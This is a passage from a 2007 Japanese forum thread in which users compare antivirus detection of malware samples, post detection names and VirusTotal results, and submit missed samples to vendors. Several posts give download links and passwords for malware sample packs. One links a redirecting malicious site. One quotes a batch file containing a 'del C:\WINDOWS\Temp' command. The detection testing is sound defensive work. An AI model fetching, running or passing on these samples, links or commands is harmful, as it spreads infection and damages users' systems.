886:名無しさん@お腹いっぱい。
07/09/20 08:11:04
>882
オツカレさま!!!
avast!検出せず・・・
提出しました。
887:名無しさん@お腹いっぱい。
07/09/20 09:16:36
>>882
AVG IS
Virus identified Obfustat.PIZ 検出
888:名無しさん@お腹いっぱい。
07/09/20 09:49:43
>>882
McAfeeスルーヽ(`Д´)ノ
889:名無しさん@お腹いっぱい。
07/09/20 14:55:37
>>882
bitdefender一個検出
890:名無しさん@お腹いっぱい。
07/09/20 16:48:38
>>882
乙です
Norton Internet Security 2008 反応無し
Symantecへ贈っておきました
891:名無しさん@お腹いっぱい。
07/09/20 20:47:46
>>882
ノートン対応
\IMG09-18.jpeg-www.photoupload.com
コンピュータ:
結果: このファイルの検出結果 W32.Spybot.Worm. URLリンク(www.symantec.com)
892:名無しさん@お腹いっぱい。
07/09/20 21:27:47
Kazaa板キンタマってとこか
BOT機能あるからP2P以外でも利用する意味があるわけね。
893:名無しさん@お腹いっぱい。
07/09/22 13:58:03
URLリンク(www5.uploader.jp)
Pass: Malware-Pack3
いろいろ詰め合わせ
McAfeeには提出済み
894:名無しさん@お腹いっぱい。
07/09/22 14:18:59
>>393
2\JsT.js : JS_AGENT.UHI
6\sina.htm : TROJ_Generic
9\sys614.htm : JS_DLOADER.PUX
b\soft.exe : TROJ_DLOADER.QDI
残りは送付済み
895:894
07/09/22 14:19:46
>>894
はウイルスバスター2007です。
896:名無しさん@お腹いっぱい。
07/09/22 15:15:36
あらら、virustotalからSymantecが無くなってるる。。。
>>893
ノートン反応
\b\soft.exe は Downloader ウィルスに感染しています。
無反応分、シマンテックに検体送付しました。
897:名無しさん@お腹いっぱい。
07/09/22 17:28:04
カスペ7
0 Trojan-Downloader.VBS.Agent.eg
1 Trojan-Downloader.VBS.Agent.ef
2 Trojan-Downloader.VBS.Agent.ee
4 Trojan-Downloader.VBS.Agent.eh
5 Trojan-Downloader.VBS.Agent.ed
6 Trojan-Downloader.VBS.Agent.ec
7 Trojan-Downloader.JS.Agent.rd
8 Trojan-Downloader.JS.Agent.nv
8 Trojan-Downloader.JS.Psyme.nv
c Trojan-Downloader.JS.Agent.rc
898:名無しさん@お腹いっぱい。
07/09/22 18:32:03
>>893
897を訂正すると、
×8 Trojan-Downloader.JS.Psyme.nv
○9 Trojan-Downloader.JS.Psyme.nv
の誤り
b detected: virus Heur.Trojan.Generic (modification) File: tane_uljp00135.zip/malware/b/soft.exe(ヒューリスティック検知)
未検知分は、検体提出。
899:名無しさん@お腹いっぱい。
07/09/22 20:45:54
>>893
まいど乙
AVIRA Antivir PEC
検出分
0\index.htm: HEUR/Exploit.HTML
1.htm: HEUR/Exploit.HTML
4\flash.js: HEUR/Exploit.HTML
5\index.htm: HEUR/Exploit.HTML
6\sina.htm: HTML/Dldr.Sina
9\sys614.htm: EXP/WMPload.A
b\soft.exe: TR/Dldr.Versie.1
未検出分送致スミ
900:名無しさん@お腹いっぱい。
07/09/22 21:02:38
>>893
ウイルスキラー
1\1.htm
Trojan.DL.VBS.Small.ez
5\index.htm
Trojan.DL.VBS.Agent.xhd
6\sina.htm
Trojan.DL.VBS.Agent.xfq
901:898
07/09/22 22:22:29
3について、白の返事
Hello,
s_14_0
No malicious code was found in this file.
Please quote all when answering.
bについてシグネチャに変更
Trojan program Trojan-Downloader.Win32.Delf.cex
902:名無しさん@お腹いっぱい。
07/09/22 23:49:29
>>893
AVG IS
0 Downloader.Agent.m
4 Virus found JS/Downloader.Agent
5 Downloader.Agent.m
6 Downloader.Small.dk
8 Virus found JS/Downloader.Agent
b Trojan horse Generic7.QVB
c Virus found JS/Downloader.Agent
903:名無しさん@お腹いっぱい。
07/09/23 12:57:32
キング
malware\b\soft.exe
Win32.Troj.OnLineGames.sj.37888
904:名無しさん@お腹いっぱい。
07/09/23 14:02:20
KINGやるぅ~
905:名無しさん@お腹いっぱい。
07/09/23 14:16:28
>>898
>b detected: virus Heur.Trojan.Generic (modification) File: tane_uljp00135.zip/malware/b/soft.exe(ヒューリスティック検知)
カスペ7 ヒューリスティックちゃんと動作するんだな
積極的な効き味ではないみたいだけど・・・
堅実な方向に振っているな
906:名無しさん@お腹いっぱい。
07/09/23 14:29:31
カスペ厨必死だねw
907:名無しさん@お腹いっぱい。
07/09/23 14:35:08
s_14_0を獄窓につっこんでも?としか表示されない
ヘッダを見ると.exeらしいんだが どういうこと?
908:名無しさん@お腹いっぱい。
07/09/23 15:50:21
URLリンク(zero.bestmanage3.org)
pass:virus
909:名無しさん@お腹いっぱい。
07/09/23 16:07:27
>>908
踏んだらカスペが鳴きっぱなしだった
910:名無しさん@お腹いっぱい。
07/09/23 16:12:30
>>908
ノートン・ファイター大激怒
911:名無しさん@お腹いっぱい。
07/09/23 16:15:45
>>908
URLリンク(85.255.116.234)
ここに飛ばされるね
ちょっとびっくりした
URLリンク(so.7walker.net)
912:名無しさん@お腹いっぱい。
07/09/23 16:31:46
これかぁ
営業企画お尻に火がついた戦士ノートン・ファイター
URLリンク(news.google.com)
913:名無しさん@お腹いっぱい。
07/09/23 16:42:42
ノートン・ファイター
URLリンク(internet.watch.impress.co.jp)
914:名無しさん@お腹いっぱい。
07/09/23 16:52:08
>>908
inhoster.com
915:名無しさん@お腹いっぱい。
07/09/23 17:08:56
URLリンク(www.dotup.org)
virus
ノートン送付済み
916:名無しさん@お腹いっぱい。
07/09/23 17:12:48
inst.exe
おちんぽ!!!!!おちんぽ!!!!!!!!!!
うせろ。
917:名無しさん@お腹いっぱい。
07/09/23 17:16:11
>>915
バスタースルー
918:名無しさん@お腹いっぱい。
07/09/23 17:23:52
Microsoft 1.2803 2007.09.23 password protected
NOD32v2 2545 2007.09.23 the file is probably password protected.
パスワードなんて掛かってないのに・・・・2つだけおバカメッセージを出した以外は無反応かあ。
919:名無しさん@お腹いっぱい。
07/09/23 17:26:05
新種か
カスペに送っておきます
920:名無しさん@お腹いっぱい。
07/09/23 17:29:10
>>915
㌧。
カスペ7 スルー
VTでも反応しないみたいだがだが。
921:918
07/09/23 17:29:22
すまん、バカは俺だった。いってくる・・・・
922:名無しさん@お腹いっぱい。
07/09/23 18:29:45
>>893
Risingより
1.文件名:index.htm
病毒名:Trojan.DL.Script.JS.Agent.lht
2.文件名:JsT.js
病毒名:Trojan.DL.Script.JS.Agent.lhx
3.文件名:s_14_0
不是病毒
4.文件名:flash.js
病毒名:Trojan.DL.Script.JS.Agent.lhy
5.文件名:index.htm
病毒名:Trojan.DL.Script.JS.Agent.lhw
6.文件名:bodg.htm
病毒名:Trojan.DL.Script.JS.Agent.lhv
7.文件名:sys614.htm
病毒名:Trojan.DL.Script.JS.Agent.a
8.文件名:Pic368.gif
不是病毒
9.文件名:soft.exe
病毒名:Trojan.DL.Win32.Autorun.ytd
10.文件名:smss.htm
病毒名:Trojan.DL.Script.JS.Agent.lhu
>>915
キラースルー
923:名無しさん@お腹いっぱい。
07/09/23 18:40:56
>>915
AVGスルー
924:名無しさん@お腹いっぱい。
07/09/23 18:42:13
>>915
McAfeeもいつも通りスルー
925:名無しさん@お腹いっぱい。
07/09/23 18:42:29
>>915
カスペから反応来た
>No malicious code was found in this file.
>Please quote all when answering.
926:名無しさん@お腹いっぱい。
07/09/23 19:39:54
NOD32スルー
927:名無しさん@お腹いっぱい。
07/09/23 20:08:20
>>915
AntiVir スルー
928:名無しさん@お腹いっぱい。
07/09/23 20:12:27
>>908
ZoneAlarmPROアンチスパイウェアが、サイトに接続をブロック
929:名無しさん@お腹いっぱい。
07/09/23 20:24:32
>>908
キングじゃ怖くて踏めません
930:名無しさん@お腹いっぱい。
07/09/23 20:49:38
>>908
馬鹿野郎!zipだと安心してリカバリ完了後の穴だらけPCで
踏んじゃったジャマイカ!
931:930
07/09/23 20:51:31
案の定変なプロセス動いてますた('・ω・)
932:名無しさん@お腹いっぱい。
07/09/23 20:59:37
怒った後、急に静かに… カワイソスw
933:930
07/09/23 21:12:45
あやしいファイルひとまとめにして検体にします(・ω・)ノ
from 第二号機PC
934:930
07/09/23 22:20:22
駆除作業完了!って思った矢先これですか・・・('・ω・)
URLリンク(www.dotup.org)
935:930
07/09/23 22:26:19
ダウソパス sec
zipパス fuzakenji
URLリンク(www.dotup.org)
もうリカバリします('・ω・)
936:名無しさん@お腹いっぱい。
07/09/23 22:53:33
>>915
あほかっ!!!
ただのテキストファイルだろーが。
937:八頭
07/09/23 22:57:10
YouTube - Cheap Trick
URLリンク(www.youtube.com)
938:名無しさん@お腹いっぱい。
07/09/23 22:59:44
嗚呼、916が見えないw
939:名無しさん@お腹いっぱい。
07/09/23 23:01:16
>>915
>>936確認
釣られた。。。
>>916
見落としてたよ
940:名無しさん@お腹いっぱい。
07/09/24 12:55:06
>>935
[!] ファイルがありません
www.dotup.org2686.jpg----./uploda/www.dotup.org2686.jpg_/www.dot... ファイルが存在しません。
941:名無しさん@お腹いっぱい。
07/09/24 16:16:40
>>908
キングで反応あり
RISK.Exploit.Ani
942:名無しさん@お腹いっぱい。
07/09/24 18:48:14
Is the Wildlist still relevant?
URLリンク(www.sophos.com)
今更w
943:名無しさん@お腹いっぱい。
07/09/25 07:42:31
URLリンク(www.perfect-av.com)
本日の動画!!をクリックして反応有ればAVが正常だと思うんだけど
どう?
944:名無しさん@お腹いっぱい。
07/09/25 08:13:40
Avira AntiVir PersonalEdition Classic
--> PerfectAV.exe
[DETECTION] Is the Trojan horse TR/VB.awc.14
PerfectAV.exeがDLされてくるけど、途中で反応した
945:名無しさん@お腹いっぱい。
07/09/25 08:20:24
>>943
マカフィー
検出:PWS-Hachilem
946:名無しさん@お腹いっぱい。
07/09/25 08:42:30
>>943
キング反応なし
947:名無しさん@お腹いっぱい。
07/09/25 08:43:34
>>943
EsetSmartSecurityのβ版
反応なし
948:名無しさん@お腹いっぱい。
07/09/25 09:08:39
>>943
ウイルスキラー
Trojan.PSW.VB.ado
949:名無しさん@お腹いっぱい。
07/09/25 11:50:04
>>943
Norton Internet Security 2008
Trojan.Hachilem!gen として検出
950:名無しさん@お腹いっぱい。
07/09/25 12:09:16
>>943
ウイルスバスター2007
TSPY_VB.DTV
951:名無しさん@お腹いっぱい。
07/09/25 17:46:35
>>943
avast! 4.7 Home Edition
Win32:VB-ERE [Trj]
952:名無しさん@お腹いっぱい。
07/09/25 20:09:23
>>943
カスペ7 Web-AV
detected: Trojan program Trojan.Win32.VB.awc URL: URLリンク(www.perfect-av.com)
ちんぽは反応せず。
953:名無しさん@お腹いっぱい。
07/09/25 20:42:34
直リン貼るなボケ
954:名無しさん@お腹いっぱい。
07/09/25 21:52:24
>>943 PerfectAV.exe URLリンク(www.virustotal.com)
AhnLab-V3 2007.9.22.0 2007.09.24 Win-Trojan/Xema.variant
AntiVir 7.6.0.15 2007.09.25 TR/PSW.VB.KB.17
Authentium 4.93.8 2007.09.25 W32/PWStealer.KEN
Avast 4.7.1043.0 2007.09.24 Win32:Trojan-gen. {VB}
AVG 7.5.0.485 2007.09.25 PSW.Generic4.JOG
BitDefender 7.2 2007.09.25 Trojan.Pws.Vb.KB
ClamAV 0.91.2 2007.09.25 Trojan.Spy-7188
DrWeb 4.33 2007.09.25 BackDoor.Generic.1485
eSafe 7.0.15.0 2007.09.23 Win32.VB.kb
Ewido 4.0 2007.09.24 Trojan.VB.kb
Fortinet 3.11.0.0 2007.09.25 W32/VB.KB!tr.pws
F-Prot 4.3.2.48 2007.09.25 W32/PWStealer.KEN
F-Secure 6.70.13030.0 2007.09.25 Trojan-PSW.Win32.VB.kb
Ikarus T3.1.1.12 2007.09.25 Trojan.Win32.VB.awc
Kaspersky 4.0.2.24 2007.09.25 Trojan-PSW.Win32.VB.kb
McAfee 5126 2007.09.24 PWS-Hachilem
Microsoft 1.2803 2007.09.25 PWS:Win32/VB!2DD2
NOD32v2 2549 2007.09.25 probably a variant of Win32/PSW.VB.FS
Norman 5.80.02 2007.09.25 W32/VBTroj.GLS
Panda 9.0.0.4 2007.09.25 Suspicious file
Rising 19.42.11.00 2007.09.25 Trojan.PSW.VB.ado
Sophos 4.21.0 2007.09.25 Mal/Generic-A
Sunbelt 2.2.907.0 2007.09.25 Trojan.Hachilem!gen
Symantec 10 2007.09.25 Trojan.Hachilem!gen
TheHacker 6.2.5.068 2007.09.25 Trojan/PSW.VB.kb
VBA32 3.12.2.4 2007.09.25 Trojan-PSW.Win32.VB.kb
VirusBuster 4.3.26:9 2007.09.24 Trojan.PWS.VB.FBV
Webwasher-Gateway 6.0.1 2007.09.25 Trojan.PSW.VB.KB.17
File size: 360448 bytes MD5: d22d964eec6dcb52e77f9c41cec9b4e3 SHA1: 016df57660879197ae3532491f23313779b59bc0
Result: 28/32 (87.5%) スルー CAT-QuickHeal eTrust-Vet FileAdvisor Prevx1
>>946 キングに送っておいた。
955:名無しさん@お腹いっぱい。
07/09/25 23:36:03
>>943
NOD32なんだけど、ふつーにDLできちゃうしデスクトップ上の
「PerfectAV.exe」を選択して右クリックからスキャンしても無反応。。。なんで?
virustotal.comでは対応済になってるみたいだけど。
BitDefender v10でも同様に無反応。
AVGでは検出&削除できるからDLミスってこともない。
956:名無しさん@お腹いっぱい。
07/09/25 23:57:02
NODはよく知らないがヒューリスティックで検知してるみたいだから
ヒューリスティックの設定がわるいんじゃないか?
957:名無しさん@お腹いっぱい。
07/09/26 00:53:44
>>955
アップデートしてないんじゃない?
朝の時点ではBitDefenderとNODは対応してなかった
958:名無しさん@お腹いっぱい。
07/09/26 03:03:45
ワロタ
959:名無しさん@お腹いっぱい。
07/09/26 06:19:50
■■■■■■○○○○○○○○○○○○○○○
■○○○○■○■■■■■○○○■■■■■○
■○○○○■○■○○○■○○○○○○○■○
■○○○○■○■○○○■○○○○○○■○○
■○○○○■○■○○○■○○○○○○■○○
○○○○■○○■○○○■○○○○○■○○○
○○○○■○○■○○○■○○○○○■■○○
○○○■○○○■○○○■○○○○■○○■○
○○○■○○○■■■■■○○○■○○○○■
○○■○○○○■○○○■○○■○○○○○○
○○○○○○○○○○○○○○○○○○○○○
○○○○○○○○○○○○○○○○○○○○○
960:名無しさん@お腹いっぱい。
07/09/26 09:45:28
URLリンク(www5.uploader.jp)
pass: Malware-Pack4
いろいろ詰め合わせ
McAfeeには提出済み
961:名無しさん@お腹いっぱい。
07/09/26 10:41:03
>>960
Avira AntiVir V7.00.00.14
1.js
121.exe
gmsex.exe
spb40.exe
tool.js
上記未検出につき提出済み。
962:名無しさん@お腹いっぱい。
07/09/26 11:01:37
Avira 一応
--> malware\0\51-70.pif
[DETECTION] Contains detection pattern of the HEUR-DBLEXT/Crypted virus
--> malware\1\setup.exe
[DETECTION] Contains a detection pattern of the (dangerous) backdoor program BDS/Hupigon.dsx.243 Backdoor server programs
--> malware\3\mminstall.exe
[DETECTION] Is the Trojan horse TR/Spy.Banker.TW.116
--> malware\4\bf.htm
[DETECTION] Contains detection pattern of the Java script virus JS/Agent.EP
--> malware\5\ysydown.cab
[1] Archive type: CAB (Microsoft)
--> ysydown.exe
[DETECTION] Contains detection pattern of the dropper DR/Drop.Agent.amm.100
--> malware\6\player.exe
[DETECTION] Is the Trojan horse TR/Delphi.Downloader.Gen
--> malware\7\vip.exe
[DETECTION] Is the Trojan horse TR/Delphi.Downloader.Gen
963:名無しさん@お腹いっぱい。
07/09/26 11:05:08
>>960
avast!(´;ω;`)シクシク
URLリンク(nekomimi.ws)
964:名無しさん@お腹いっぱい。
07/09/26 11:24:49
>>963
ウンコ発見
965:名無しさん@お腹いっぱい。
07/09/26 12:01:01
>>960
㌧
カスペ7
8/12 (5,6はヒューリスティック)
検体提出
detected: Trojan program Trojan-PSW.Win32.OnLineGames.dij File:0/51-70.pif//PE_Patch.PECompact//PecBundle//PECompact
detected: malware not-virus:Hoax.Win32.Avola.a File:1/setup.exe//PE_Patch.UPX//UPX
detected: Trojan program Trojan-Downloader.Win32.Agent.dlv File:3/mminstall.exe
detected: virus Heur.Invader (modification) File:5/ysydown.cab/ysydown.exe//ASPack
detected: virus Heur.Downloader (modification) File:6/player.exe//PE_Patch.UPX
detected: Trojan program Trojan-Spy.Win32.Agent.abv File:7/vip.exe//PE_Patch//UPack
detected: Trojan program Trojan-PSW.Win32.OnLineGames.dor File:8/gmsex.exe
detected: Trojan program Trojan-Downloader.JS.Agent.oq File:9/1.js//JSPack
966:名無しさん@お腹いっぱい。
07/09/26 12:23:07
>>960
AVG Anti-Malware
0\51-70.PIF
Trojan horse PSW.Lineage.AAV
1\setup.exe
Trojan horse SHeur.OGX
2\121.exe
Trojan horse Downloader.Generic6.HYO
3\MMINSTALL.EXE
Trojan horse Generic7.UAP
4\bf.htm
Downloader.Agent.fm
5\ysydown.cab
Trojan horse Downloader.Generic6.JJH
6\PLAYER.EXE
Trojan horse Generic8.AAX
7\VIP.EXE
Trojan horse Generic7.ZMC
8\GMSEX.EXE
Trojan horse Generic7.ZMG
9 a bはスルーしたので送ります
967:名無しさん@お腹いっぱい。
07/09/26 12:30:17
AVGすげー
968:名無しさん@お腹いっぱい。
07/09/26 12:33:58
>>960乙です
Norton Internet Security 2008
/1/setup.exeを Awola として検出
/2/121.exe Downloader として検出
/3/mminstall.exe Trojan.Farfli として検出
その他は反応無しなので贈っておきます
969:名無しさん@お腹いっぱい。
07/09/26 12:56:51
>>960
McAfee完全スルー
970:名無しさん@お腹いっぱい。
07/09/26 14:58:59
>>960
ウイルスバスター2007
51-70.pif
TSPY_WOWSTEAL.CN
ysydown.cab
TROJ_SMALL.IMH
vip.exe
TROJ_DELF.IVK
gmsex.exe
Possible_Infostl
残り検体提出します
971:名無しさん@お腹いっぱい。
07/09/26 16:09:21
>>960
んー、某資料室の人?
>>963
なんかハクられてね?
972:名無しさん@お腹いっぱい。
07/09/26 17:18:25
>>971
いんや、どこの人でもないよ
973:名無しさん@お腹いっぱい。
07/09/26 18:02:37
>>972
そか。McAfee使いで中華アカハックトロイばっかだったんで勘違いした。
974:名無しさん@お腹いっぱい。
07/09/26 20:37:34
>>960
ウイルスキラー
2\121.exe
Trojan.DL.Win32.Agent.zdy
7\vip.exe>>upack0.36
Trojan.Clicker.Win32.PopHot.bq
8\gmsex.exe
Trojan.PSW.Win32.QMOnline.a
975:名無しさん@お腹いっぱい。
07/09/26 20:55:42
次スレどこー??
976:965
07/09/26 21:08:56
>>960
カスペ2次報告
9(ほかに2は返事待ち)/11
: Trojan program Trojan-PSW.Win32.OnLineGames.dij File: 0/51-70.pif
: malware not-virus:Hoax.Win32.Avola.a File: 1/setup.exe
: Trojan program Trojan-Downloader.Win32.Hmir.ae File: 2/121.exe(検体提出による追加検出)
: Trojan program Trojan-Downloader.Win32.Agent.dlv File: 3/mminstall.exe
: malware Exploit.JS.Agent.am File: 4/bf.htm(検体提出による追加検出)
: Trojan program Trojan-Downloader.Win32.Delf.cfu File: 5/ysydown.cab/ysydown.exe (シグネチャに変更)
: virus Virus.Win32.AutoRun.pd File: 6/player.exe (シグネチャに変更)
: Trojan program Trojan-Spy.Win32.Agent.abv File: 7/vip.ex
: Trojan program Trojan-PSW.Win32.OnLineGames.dor File: 8/gmsex.exe
: Trojan program Trojan-Downloader.JS.Agent.oq File: 9/1.js
a/tools.js→返事待ち
b/spb40.exe→返事待ち
977:名無しさん@お腹いっぱい。
07/09/26 21:13:34
>>975
ここは、どうよ。
糞スレリサイクル。250レスほど余っている。
【NOD厨】検出力調査スレ2【出禁】
スレリンク(sec板)
それとも、新スレ立てた方がいいか?
978:名無しさん@お腹いっぱい。
07/09/26 21:24:33
>>977
そこは機能していない。放置でいいと思う。
こっちを再利用するのはいいと思う。
【信者】検出力調査スレ3【禁止】
スレリンク(sec板)
979:名無しさん@お腹いっぱい。
07/09/26 21:25:58
キング
0\51-70.pif Win32.Troj.Downloader.ph.110592
一匹
送っておいたお
980:名無しさん@お腹いっぱい。
07/09/26 22:19:04
>>978
そっちの方がいいかも。
981:名無しさん@お腹いっぱい。
07/09/26 22:37:24
>>954
(m´・ω・`)m ゴメン…
おいらが、先に送っちゃった
982:名無しさん@お腹いっぱい。
07/09/26 22:38:58
423 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2007/09/26(水) 22:06:25
****W32.DarkManko.F****
Winnyなどに出回っている
"めっちゃ臭いやん.avi exe"
というファイルを実行してしまうと感染。
画面上にDarkMankoが張り付きます
427 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2007/09/26(水) 22:23:25
W32.DarkManko.Fの検体入手しますた
URLリンク(up-sv.ath.cx)
983:名無しさん@お腹いっぱい。
07/09/26 22:41:21
>>978
こっちで良いと思う。多分>>977は荒らしで埋まる。
984:名無しさん@お腹いっぱい。
07/09/26 22:42:49
>>982
中身はバッチファイルで、
del C:\WINDOWS\Temp
しか書いてない。
985:名無しさん@お腹いっぱい。
07/09/26 22:44:59
del C:\WINDOWS\Temp
え?